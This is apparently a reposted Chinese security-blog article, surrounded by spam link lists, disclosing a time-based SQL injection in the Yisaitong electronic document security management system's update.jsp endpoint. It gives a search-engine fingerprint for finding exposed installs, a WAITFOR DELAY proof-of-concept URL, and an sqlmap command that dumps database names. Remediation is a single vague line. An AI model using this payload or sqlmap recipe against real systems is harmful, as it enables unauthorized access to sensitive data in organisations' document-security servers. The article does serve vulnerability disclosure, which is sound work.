当前位置: 首页 > news >正文

建设官方网站企业网银登录注册公司网站的费用

建设官方网站企业网银登录,注册公司网站的费用,宣城seo,erp企业管理系统软件排名目录 0x01 漏洞介绍 0x02 影响产品 0x03 语法特征 0x04 漏洞复现页面 0x05 漏洞修复建议 0x01 漏洞介绍 亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台&#…

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议


0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 
  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 
  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

图片

                                                   没看够~?欢迎关注扫一扫~

http://www.hyszgw.com/news/62481.html

相关文章:

  • 优秀的移动端网站app开发公司认可湖南岚鸿推 荐
  • 有网站地图的网站济宁建设网站
  • 怎么做网站赚大钱北京高端网站建设规划
  • 合肥网站建设yjhlw营销战略咨询公司
  • 网站备案 企业备案网站建费用
  • 嘉兴专业做网站在百度阿里建个网站多少钱
  • 外贸类网站建设在校大学生可以注册公司吗
  • 旅游网站开发文档怎么写网站模板破解下载
  • 农产品的网站建设方案以及范文什么软件推广好
  • 太原百度网站快速排名网站开发博客
  • 做网站要什么功能如何做网站内部优化
  • 网站开发项目建设规范网站建设服务商排名
  • 域名备案时网站名字wordpress评论分页不显示
  • 网站设置文件夹权限设置百度提交网站入口
  • 肇庆网站建设方案优化源码市场
  • 米方科技网站建设国内免费开源crm
  • 青海网站开发公司网络销售是做什么
  • 破解织梦做的网站免备案虚拟主机空间
  • 站长统计app下载怎样建设大型网站
  • 集团网站设计公司西安好的网站建设公司
  • 中国十大设计素材网站关键词在线下载
  • 做企业展示版网站贵吗广州网页设计工资
  • 公司网站建设项目目的查看网站是否wordpress
  • 网站开发验证码的有效性合肥关键词排名优化
  • 兰州网站建设ulezhi各大网站推广软件
  • 判断网站中信建设有限责任公司陶扬
  • 石家庄网站外包wordpress安装后首页字体太大
  • 网站开发要学的代码wordpress平台搭建
  • 华为手机网站建设策划方案论文深圳住房城乡建设局网站首页
  • 广州网站建设=388元网站维护基本概念认知